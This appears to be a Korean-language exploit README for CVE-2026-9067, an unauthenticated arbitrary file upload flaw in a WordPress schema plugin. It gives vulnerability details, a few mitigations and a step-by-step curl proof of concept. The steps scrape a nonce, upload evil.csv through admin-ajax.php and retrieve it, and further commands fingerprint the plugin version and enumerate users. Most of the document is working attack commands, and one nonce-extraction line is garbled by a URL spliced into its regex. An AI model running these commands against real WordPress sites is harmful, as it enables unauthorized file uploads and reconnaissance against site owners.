
Schema & Structured Data for WP & AMP < 1.60 - 인증되지 않은 임의 미디어 업로드 [POC & Xploit]
WordPress 보안 테스트 환경에서 발견된 취약점에 대한 문서 및 익스플로잇
| CVE ID | 플러그인 | 심각도 | 유형 | 상태 |
|---|---|---|---|---|
| CVE-2026-9067 | Schema & Structured Data for WP & AMP | 높음 (8.1) | 무제한 파일 업로드 | 문서화됨 |
| 필드 | 값 |
|---|---|
| CVE ID | CVE-2026-9067 |
| 플러그인 | Schema & Structured Data for WP & AMP |
| 영향받는 버전 | < 1.60 |
| CWE | CWE-434 (위험한 유형의 파일 무제한 업로드) |
| CVSS v3.1 | 8.1 (높음) |
| 발견자 | 0xBassia |
Schema & Structured Data for WP & AMP 플러그인 버전 1.60 미만은 파일 업로드를 위한 AJAX 핸들러에서 사용자 권한을 검증하지 않고 업로드된 파일 형식을 검증하지 않습니다. 이로 인해 인증되지 않은 공격자가 임의 파일을 업로드할 수 있습니다.
중요 참고사항: WordPress 코어는 실행 파일(.php, .phtml, .html, .svg)을 차단하므로, 이 취약점으로 인한 직접적인 RCE 경로는 없습니다.
CVE-2026-9067/
├── CVE-2026-9067.md # Dokumentasi lengkap (file ini)
├── CVE-2026-9067.py # Python exploit dengan multi-threading
├── CVE-2026-9067.sh # Bash/Shell PoC script
└── CVE-2026-9067_exploit.sh # Alternative Bash PoC
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/main/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)
# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
-F 'action=saswp_rf_form_image_upload' \
-F "saswp_rf_form_nonce=$NONCE" \
-F '[email protected];type=image/png;filename=evil.csv'
# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"
| 필드 | 값 |
|---|---|
| 대상 URL | https://yorbit7.ddev.site |
| PHP 버전 | 8.4 |
| 데이터베이스 | MariaDB 11.8 |
| WordPress 버전 | 7.0 |
| 테스트 방법 | curl 기반 (블랙박스 테스트) |
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'
DISALLOW_FILE_MODIFICATIONS 상수 설정.htaccess를 통해 업로드 디렉토리에서 PHP 실행 비활성화